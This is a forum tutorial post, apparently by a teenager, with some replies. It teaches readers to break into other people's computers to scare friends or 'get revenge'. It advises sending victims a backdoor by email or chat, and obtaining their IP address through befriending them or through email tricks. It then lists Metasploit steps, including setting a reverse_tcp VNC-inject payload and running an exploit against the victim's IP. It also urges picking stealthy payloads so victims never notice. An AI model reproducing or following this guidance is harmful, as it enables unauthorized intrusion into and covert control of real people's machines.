[Tutorial 2] Hacking into a Computer

Hello.

Have you ever wanted to impress your friends, scare them, or get revenge on someone?

Well with my tutorial(s) I can show you how to do that.
This is my first tutorial so bear with me.
Also, this tutorial is going to be put into parts because I have school and AP classes.

Tutorial 2: Hacking into a Computer

Ok, Im going to start off by telling you this one true fact:
- If you dont want to get hacked, update your computer!

People around the worked get hacked everyday because they don't do that one simple thing, and it is update their computer.

Tools needed:
1. A computer
2. Backtrack 4
3. Wireless(Optional)

1. THE COMPUTER/PROGRAMS

Well, right now im going to show you how to do it with Backtrack 4, in my later tutorials I will teach you with windows, because they are completely different.

I dont care what type of computer you have, with works with any...

How to get Backtrack 4:
-Google "backtrack 4" and find the result that sends you to "backtrack-linux"
-Go to downloads and download "BackTrack 4 Final Release ISO"
-Wait until it finished, if you dont have a blank DVD I suggest you get one
-Burn the .iso file onto the DVD and your done*

How to use Backtrack 4:
-Insert the DVD into your computer and restart
-Boot from the DVD*
-Your computer will look like the ones that are in the movies...
-Wait until you get asked for a login
-Login: "root" Password: "toor" (without quotes)
-Your done...Now to hack.

2. WHAT YOU NEED

If you have made it this far, good job. Now were going to hack.
Hacking remotely:
-Make a backdoor and send it to them via AIM or email or something....
Hacking locally:
-(Will be explained in future tutorial)

I am going to show you the first method only, because the second one will be combined with another tutorial I will be working on.

Ok, now you wanna hack? You sure your ready? Well, wrong your not.

This will all be useless if you dont have an IP Address. Basically, an IP Address is the address of a person. Without it your basically trying to go somewhere when you dont know their address. How can it be done?
Two methods can be used:
SOCIAL ENGINEERING: Go to their house, befriend them and gain access to their computer for 5 mins...
EMAILING: Send them an email

If you gain access to their computer, go to "ipchicken.com" and copy down the IP address and the remote port. You can now go back home.

Refer to this website for info on obtaining the IP through an email: "https://aruljohn.com/info/howtofindipaddress/"

3. ACTUALLY HACKING...OMG...OMG...PIE...OMG...RWAR.

Well, hopefully you got the IP Address, if you didnt leave a reply and I will help you.
So far so good, I hope you didnt get caught.
From now on, this is the actual serious stuff, so re-read this once you finish just to make sure.
Please dont do read this and do it at the same time, read the tutorial first.

1. Once you boot into Backtrack 4, we will open Metasploit. You can do this by opening a terminal and typing this "./msfconsole" or you can type "msfconsole"
2. Once it completely loads we can start hacking
3. Type "show payloads"...now a list should appear. Find one that you would like to use and write the entire address somewhere.
4. Type "set payload" followed by the address that you wrote down, so it would be something like this: "set payload windows/vncinject/reverse_tcp"
5. Type "show options" Now a list should pop up, saying what goes in each.
6. To actually set the options you need to do this "set RHOST ???"...Replace the ??? with the IP address, do this for LHOST,LPORT,RPORT and anything else that has to be filled out
7. Once it is all filled out type "exploit" and wait, if successful, you should be able to do what you wanted depending on the payload that you chose.


Sorry, I took so long doing this...too much school work. Junior year in highschool is a pain in the ass...

Well, depending on the payload you choose. Some are so stealthy that you will never know its even happening to you. Some actually shows it on their screen. Read the descriptions of the payloads, and you should be able to tell which is more stealthy than the other.

By the way, VNC Inject is not STEALTHY! I just used it as an example. There are better ones in that list

I actually have 4 tests today in school and its friday...it sucks.

Also, in my other tutorials they become more and more stealthy, this is just the basics. I will start Tutorial 3 on Monday of next week.

Ok, thanks for the tip. Im going to see if I can make this one more in depth but I promise you the next one will be more in depth and it might have screenshots as well. Algebra 2 compared to Pre-Calc is a piece of cake. Pre-Calc in my school involves more graphing and functions than actual math. I miss the good old days when math was 1 + 1 = 2.

Imiss nap time...ya I took algebra 2 because its all we need for math requirement for our schools advanced designation diploma..im just not a math kid...lol I got mad high on all the sat2s for history w/o studying lol

Depending on the payload yes. Basically you can do anything, it just all depends on the payload. Some like VNC will take control over their entire computer but its not stealthy. With others, you can inject a backdoor and take full control whenever you want and they wont know.

You did not explain what the ip was for. You said it was for a back door but where does it say to use the ip to gain access?
